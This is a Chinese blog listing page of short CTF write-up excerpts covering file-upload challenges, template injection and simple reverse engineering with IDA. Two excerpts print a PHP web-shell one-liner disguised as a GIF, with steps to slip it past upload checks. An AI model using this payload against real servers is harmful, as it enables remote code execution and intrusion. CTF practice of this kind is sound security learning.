摘要:
启动靶机,打开环境 又是一道Upload题。 根据上一道题的思路来, 先上传一个phtml文件 GIF89a <script language="php">eval($_POST['shell']);</script> 上面显示Not image 那我们用bp来抓一下包。 然后修改一下格式 然后这里 阅读全文
posted @ 2020-10-15 14:33
AW_SOLE
阅读(491)
评论(0)
推荐(0)
摘要:
启动环境,打开靶机 既然,题目都叫Upload,那肯定是要上传文件的嘛。 然后我们先写一个phtml文件 GIF89a <script language="php">eval($_POST['shell']);</script> 然后上传, 出错,发现不允许上传phtml文件 猜测这应该是前端js验 阅读全文
posted @ 2020-10-15 14:04
AW_SOLE
阅读(455)
评论(0)
推荐(0)
摘要:
当我们打开网页的时候,看见了 那我们都来查看一下吧。 通过第一个条件我们得知,flag是存放在里的。 而第二个条件说的render,它其实是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页,如果用户对render内容可控,不仅可以注入XSS代码,而且还可以通过{{}} 阅读全文
posted @ 2020-10-15 13:40
AW_SOLE
阅读(117)
评论(0)
推荐(0)
摘要:
启动靶机,下载并解压压缩包 使用ida打开,shift+f12直接查看字符串 然后双击跟进,查看伪代码 对应str2 查看str2,则flag就为{hello_world} 最后是要将o变为0的 阅读全文
posted @ 2020-10-15 01:24
AW_SOLE
阅读(100)
评论(0)
推荐(0)
摘要:
启动靶机后,先把压缩包解压下来, 然后将easyre.exe拖到idaq64内, 然后按shift+f12,就找到flag了 或者是在找到main()函数,然后按f5,查看伪代码,也能找到flag 阅读全文
posted @ 2020-10-15 00:56
AW_SOLE
阅读(377)
评论(0)
推荐(0)